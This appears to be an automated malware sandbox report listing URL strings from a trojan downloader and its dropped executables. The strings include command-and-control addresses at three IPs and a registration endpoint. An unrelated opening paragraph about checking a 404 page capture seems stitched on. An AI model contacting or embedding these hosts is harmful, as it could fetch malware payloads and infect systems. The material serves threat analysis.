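For the capture in this report the check comes back clean: 564 decoded bytes, matching the header, server banner "nginx/1.18.0 (Ubuntu)", six padding comments, stock page. The same function applied to a dump whose length disagrees with Content-Length, or whose body is not the stock page, is the signal that the "404" is hiding something.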
Source: winploravr.exe, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, winploravr.exe.7.dr, sysbrapsvc.exe.0.dr, winploravr.exe0.7.dr, 3193211493.exe.2.dr, 1146722911.exe.2.dr String found in binary or memory: http://185.215.113.66/
Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000002.1835372056.000000000099E000.00000004.00000020.00020000.00000000.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.dr String found in binary or memory: http://185.215.113.66/1
Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/1A
Source: 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.dr String found in binary or memory: http://185.215.113.66/1http://185.215.113.66/2http://185.215.113.66/3http://185.215.113.66/4http://1
Source: 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.dr String found in binary or memory: http://185.215.113.66/2
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2.233.141/
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2H
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2O
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/3
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3:(
                            Source: sysbrapsvc.exe, 00000002.00000003.1794514607.0000000000692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3KKC:
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3T
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3860975696.0000000000692000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/4
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3860975696.0000000000692000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/5
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5C:
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5P
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/6
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/61(
                            Source: 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/_1
                            Source: 1146722911.exe, 00000007.00000002.3857092737.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_1/
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_1Ih
                            Source: 1146722911.exe, 00000007.00000002.3857092737.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_1_
                            Source: 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/_2
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_2.233.141/_2
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_2Ah
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_2Yk
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_2ah(d-
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_2d
                            Source: 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3854688865.000000000073A000.00000004.00000010.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009CB000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/_3
                            Source: 1146722911.exe, 00000007.00000002.3854688865.000000000073A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_32_p0
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_36
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_36U
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_36o
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_377p
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_3Yh
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_3mily
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_3qh
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_3t
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/der
                            Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, sysbrapsvc.exe.0.dr, 3193211493.exe.2.drString found in binary or memory: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user
                            Source: sysbrapsvc.exe, 00000002.00000003.1665949097.0000000004781000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000000.1686101953.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp, 1146722911.exe, 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp, winploravr.exe, 00000009.00000000.1825407566.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe.7.dr, winploravr.exe0.7.dr, 1146722911.exe.2.drString found in binary or memory: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/_1_2_3%s:Zone.Identifier%windir%%
                            Source: sysbrapsvc.exe, 00000002.00000002.3863143068.0000000002263000.00000004.00000020.00020000.00000000.sdmp, 300129380.exe, 00000012.00000000.2034540259.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe, 00000012.00000002.2075465997.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe.2.drString found in binary or memory: http://185.215.113.66/reg.php?s=%s
                            Source: sysbrapsvc.exe, 00000002.00000002.3863143068.0000000002263000.00000004.00000020.00020000.00000000.sdmp, 300129380.exe, 00000012.00000000.2034540259.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe, 00000012.00000002.2075465997.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe.2.drString found in binary or memory: http://185.215.113.66/reg.php?s=%sMozilla/5.0
                            Source: winploravr.exe, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, winploravr.exe.7.dr, sysbrapsvc.exe.0.dr, winploravr.exe0.7.dr, 3193211493.exe.2.dr, 1146722911.exe.2.drString found in binary or memory: http://193.233.132.177/
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/1
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/2
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/2S
                            Source: sysbrapsvc.exe, 00000002.00000002.3863535540.00000000024DB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/31A
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/377
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3C
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3graphy
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3h.dll
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3s
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/4
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/4#
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/5
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/6
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_1
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_2
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_21hXd#
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_2g
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_2ih0d.
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_3
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_39h
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_3Qh8d/
                            Source: winploravr.exe, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, winploravr.exe.7.dr, sysbrapsvc.exe.0.dr, winploravr.exe0.7.dr, 3193211493.exe.2.dr, 1146722911.exe.2.drString found in binary or memory: http://91.202.233.141/
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1S4
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1xF;
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2:
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4e
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5G4
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5V
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5Y
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5e
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3860975696.0000000000692000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6.F;
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6P
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_1
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_11
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/_11N:we
Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/_16
Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/_1K
Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/_2
